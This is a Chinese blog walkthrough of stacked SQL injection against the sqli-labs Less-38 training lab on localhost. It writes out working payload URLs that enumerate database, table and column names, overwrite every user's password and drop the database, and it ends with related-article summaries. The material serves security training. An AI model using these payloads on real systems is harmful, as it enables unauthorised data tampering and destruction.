MySQL之堆叠注入

最新推荐文章于 2024-02-23 02:56:35 发布
最新推荐文章于 2024-02-23 02:56:35 发布
阅读量1.2k 收藏
点赞数
分类专栏: web渗透实战 文章标签: mysql 数据库 堆叠注入 web渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132461080
版权

文章目录

堆叠注入

任务:对38关进行修改密码,删库,恢复环境

修改密码

38关,堆叠查询,修改密码为654321

获取存密码的表的信息

获取数据库名

http://localhost/sqli_labs/Less-38/?id=1'  and 1=2 union select 1,database(),3--+

image-20230823185317807

获得数据库名:security

获取表名

http://localhost/sqli_labs/Less-38/?id=1'  and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

image-20230823185259131

可以看到有个表名为users,可以很容易猜测到这是存用户信息的表,所以可以通过sql注入查找这个表的字段名。

获取字段名

http://localhost/sqli_labs/Less-38/?id=1'  and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users"--+

image-20230823185550019

修改密码

通过以上操作,可以知道存密码的地方在users表中,而且密码字段名字为password

通过堆叠注入即可完成修改密码的操作

http://localhost/sqli_labs/Less-38/?id=1';update users set password=654321;--+

再次正常访问,即可发现密码已经修改成了654321

image-20230823185944944

注意堆叠注入需要使用分号表示一个sql语句的结束

删库

http://localhost/sqli_labs/Less-38/?id=1';drop database security;--+

image-20230823190424250

恢复sqli_labs环境

点击如下图所指的地方即可:

image-20230823190531908

yuan_boss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入堆叠查询
m0_56578216的博客
08-23 232
结束一个sql语句后继续构造下一条语句,会不会一起执行?而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。在http://127.0.0.1/sqli-labs-master/中点击Setup/reset Database for labs重新建立一个sqli-labs数据库。分割,它和联合查询不同的地方在于,密码都为654321,修改成功!
MySQL堆叠注入
聚鼎安全
01-05 348
目录堆叠注入简介对照表格语句 堆叠注入 简介 堆叠注入mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句,堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库 对照表格 PHP连接MySQL数据库有三种方式(MySQLMysqli、PDO),同时官方对三者也做了列表性比较: Mysqli PDO MySQL 引入的PHP版本 5.0 5.0
Mysql注入 -- 堆叠注入
weixin_41489908的博客
05-25 1253
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。 ---- 网易云热评 一、堆叠注入介绍 1、多条sql语句同时执行 2、union只能执行查询语句,堆叠可以执行增删改查 3、同时执行三条语句 select 1;select 2;select 3; 二、插入注入 1、找到注入点,添加一条数据 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..
mysql堆叠注入条件_堆叠注入详解
weixin_39943383的博客
02-10 989
0x00 堆叠注入定义Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。0x01 堆叠注入原理在SQL中,分号(;)是用来表示一条sql语句的结束。...
mysql堆叠注入条件_白帽子:SQL注入堆叠注入
weixin_31358991的博客
02-10 264
原标题:白帽子:SQL注入堆叠注入在SQL语句中,语句的结束都是以`;`结尾,但是如果我们在`;`后面再加上一条SQL语句,两条语句会一起执行吗?这也就是造成堆叠注入的原因了最简单的语句`select * from users;DELETE FROM test`先查询user表,然后再从test数据库里删除user表。下面我们进行实战靶场:sql-libs38先判断闭合点,为' 再构造paylo...
sql注入堆叠注入
m0_68976043的博客
02-23 1918
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
【sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4331
堆叠注入】相比其他注入能执行的操作更多
SQL注入原理-堆叠注入
T1ngSh0w的博客
09-18 1174
SQL注入原理-堆叠注入 分为基于mysqli数据对象的注入和PDO数据对象的堆叠注入
sql注入知识---堆叠注入
尘玥的故事
04-11 1172
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
MySQL注入绕过
tcsecXD的博客
03-24 383
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+MYSQL 注入靶场
最新发布
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符型注入,SQL盲注,提供给大家进行练习使用。
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
MySQL五种报错注入1
08-04
MySQL五种报错注入/*数据库版本*//*简单办法暴库*//*连接用户*//*连接数据库*//*暴库*//*暴表*//*暴字段*//*暴内容*/2、Extra
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3159
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
MYSQL 堆叠注入详解
AaronLuo
09-19 4385
堆叠注入与受限于select语句的联合查询法相反,堆叠注入可用于执行任意SQL语句。简单地说就是MYSQL的多语句查询 堆叠注入的局限性:堆叠注入并不是在哦任何换环境下都可以执行的,可能受到API或者数据库引擎不支持的限制(如Oracle数据库),也有可能权限不足。web系统中,因为代码通常只返回一个查询结果,因此堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因...
堆叠注入原理解析
qq_45927819的博客
03-19 7636
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1427
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
mysql 堆叠注入 select drop alter都被过滤了怎么办?
03-26
首先,堆叠注入是一种高级注入技术,需要对目标网站有一定的了解和分析。如果目标网站过滤了常见的注入关键字,就需要尝试其他的注入方法,例如盲注、时间延迟注入等。 除了尝试不同的注入方法,还可以考虑使用工具,例如sqlmap等,利用其自带的多种注入技术来绕过过滤。此外,还可以通过修改payload和技巧等,来达到绕过过滤的目的。 总之,在进行堆叠注入时,需要不断尝试不同的方法和技巧,并注意对目标网站的分析和评估,以便找到可以利用的安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值